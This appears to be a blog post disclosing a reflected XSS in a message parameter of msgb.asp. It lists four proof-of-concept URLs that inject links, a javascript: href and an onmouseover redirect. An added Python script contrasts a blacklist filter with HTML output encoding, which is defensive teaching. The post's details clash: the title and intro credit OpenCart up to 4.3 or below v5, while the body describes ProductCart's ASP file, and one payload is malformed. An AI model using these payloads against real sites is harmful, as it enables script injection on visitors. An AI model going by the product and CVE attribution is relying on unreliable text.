
CVE-2014-3117 OpenCart <= 4.3 Reflective XSS

Older versions of OpenCart (< v5) had a reflected cross-site scripting (XSS) vulnerability. I requested this CVE, but never published it because I got busy with other work. So I thought better late than never 🙂

Discovery Date: 04/28/2014
Vendor Notified: 04/30/2014
CVE Assigned: 05/01/2014
Update Released: 06/01/2014

In ProductCart's msgb.asp file, the message passed in the query string is not fully sanitized before it is reflected into the page, which can compromise the integrity of affected sites. This was tested on a licensed, fully updated and patched system. These PoCs completely bypassed the vendor's sanitization rules:

https://attackdomain.com/store/pc/msgb.asp?message=HTML%20Injection%3C/a%3E

https://attackdomain.com/store/pc/msgb.asp?message=%3Ca%20href=%22http://www.google.com%22%3EBOOM!%3C/a%3E

https://attackdomain.com/store/pc/msgb.asp?message=%3Ca%20href=javascript:window.print();%3EJS%20Print%20Test%3C/a%3E

https://attackdomain.com/store/pc/msgb.asp?message=%3Ca href="" javascript:onmouseover="window.location.href=google.com;"%3E Test%3C/a%3E
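All four payloads above are plain anchor tags, which is exactly what a filter that only hunts for `<script>` misses. As an added example (not code from the original post or from ProductCart), the following Python decodes each PoC's `message` parameter, passes it through a stand-in blacklist filter and through proper HTML output encoding, and then parses the result the way a browser tokenizer would, reporting which elements and script-capable attributes survive each treatment. The blacklist filter, the parser-based check and all function names are assumptions of this example; the page does not show ProductCart's real sanitization rule.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, unquote_plus
# Constructed copies of the four proof-of-concept URLs quoted in the post.
POC_URLS = [
    "https://attackdomain.com/store/pc/msgb.asp?message=HTML%20Injection%3C/a%3E",
    "https://attackdomain.com/store/pc/msgb.asp?message=%3Ca%20href=%22http://www.google.com%22%3EBOOM!%3C/a%3E",
    "https://attackdomain.com/store/pc/msgb.asp?message=%3Ca%20href=javascript:window.print();%3EJS%20Print%20Test%3C/a%3E",
    'https://attackdomain.com/store/pc/msgb.asp?message=%3Ca href="" javascript:onmouseover="window.location.href=google.com;"%3E Test%3C/a%3E',
]

def message_param(url):
    # Decode `message` as msgb.asp sees it; split on '&' only, so the ';' in the last payload is kept.
    for pair in urlparse(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "message":
            return unquote_plus(value)
    return ""

def blacklist_filter(message):
    # Stand-in for a partial blacklist filter (assumption: the post does not show ProductCart's rule).
    # Stripping <script> alone lets anchors with javascript: URLs or on* attributes through.
    return re.sub(r"(?i)</?script[^>]*>", "", message)

def html_encode(message):
    # Output encoding for an HTML text node: <, >, &, " and ' become entities, never markup.
    return html.escape(message, quote=True)

class InjectedMarkup(HTMLParser):
    # Tokenize the reflected fragment as a browser would; record elements and script-capable attributes.
    def __init__(self):
        super().__init__()
        self.tags, self.script_attrs = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, value in attrs:
            if name.startswith("on") or (value or "").strip().lower().startswith("javascript:"):
                self.script_attrs.append((tag, name))

    def handle_endtag(self, tag):
        self.tags.append("/" + tag)

def assess(url, sanitizer):
    # Return (elements created, script-capable attributes) after `sanitizer` processes the message.
    parser = InjectedMarkup()
    parser.feed(sanitizer(message_param(url)))
    parser.close()
    return parser.tags, parser.script_attrs
```

Running `assess(url, blacklist_filter)` over every PoC yields at least one injected element (and a `javascript:` href for the third), while `assess(url, html_encode)` yields none, which is the difference between a blacklist and contextual output encoding.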